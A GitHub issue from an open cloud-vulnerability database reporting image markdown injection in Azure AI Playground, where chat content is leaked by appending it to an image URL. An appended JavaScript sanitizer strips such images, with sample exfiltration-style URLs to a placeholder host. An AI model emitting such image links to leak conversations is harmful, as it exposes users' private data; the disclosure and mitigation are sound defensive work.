wiz-sec / open-cvdb

An open project to list all publicly known cloud vulnerabilities and CSP security issues
https://cloudvulndb.org
Creative Commons Attribution 4.0 International

[Contribution] Data Exfiltration Vulnerability in Azure AI Playground #249

Closed ramimac closed 4 months ago

ramimac commented 10 months ago

Summary (give a brief description of the issue)

Image Markdown Injection in Azure AI Playground. An attacker can exfiltrate the current chat conversation by appending it to the src attribute, which is the URL where the image is loaded from. There were no integrations available (yet) that could pull remote content into the chat prompt, limiting the impact of this vulnerability.

References (provide links to blogposts, etc.)

https://embracethered.com/blog/posts/2023/data-exfiltration-in-azure-openai-playground-fixed/
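
A mitigation sketch for the class of issue summarized above, added as an example and not taken from the issue, the referenced blog post, or Microsoft's fix: a chat front end drops image references from model output unless the image host is on an allowlist, so a rendered reply cannot trigger a request to an arbitrary URL. The allowlist, host names and sample text are constructed assumptions.

```javascript
// Added example: neutralise image references in model output before rendering.
// ALLOWED_IMAGE_HOSTS is an assumed, deployment-specific allowlist.
const ALLOWED_IMAGE_HOSTS = new Set(["static.example.invalid"]);

// Markdown image syntax: ![alt](url "optional title")
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)/g;
// Raw HTML <img> tags, which many Markdown renderers pass through unchanged
const HTML_IMAGE = /<img\b[^>]*>/gi;

function isAllowedImageUrl(raw) {
  let url;
  try {
    url = new URL(raw); // relative or malformed URLs throw and are rejected
  } catch {
    return false;
  }
  // data:, http: and every non-allowlisted host are refused
  return url.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(url.hostname);
}

function sanitizeModelOutput(markdown) {
  const blocked = []; // URLs that were stripped, useful for logging and alerting
  const cleaned = markdown
    .replace(MD_IMAGE, (match, alt, url) => {
      if (isAllowedImageUrl(url)) return match;
      blocked.push(url);
      return `[image removed: ${alt || "untitled"}]`;
    })
    .replace(HTML_IMAGE, (match) => {
      const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(match);
      if (src && isAllowedImageUrl(src[1])) return match;
      blocked.push(src ? src[1] : "(no src)");
      return "[image removed]";
    });
  return { cleaned, blocked };
}

// Constructed sample of model output: one allowlisted image, two that are not.
const sample = [
  "Here is your summary.",
  "![logo](https://static.example.invalid/logo.png)",
  "![x](https://collector.example.invalid/p.png?q=PRIOR%20CHAT%20TEXT)",
  '<img src="https://collector.example.invalid/p.png?q=PRIOR">',
].join("\n");

const result = sanitizeModelOutput(sample);
console.log(result.cleaned);
console.log("blocked:", result.blocked);
```

A Content-Security-Policy `img-src` directive restricted to the same hosts gives a second layer in the browser if the filter is bypassed.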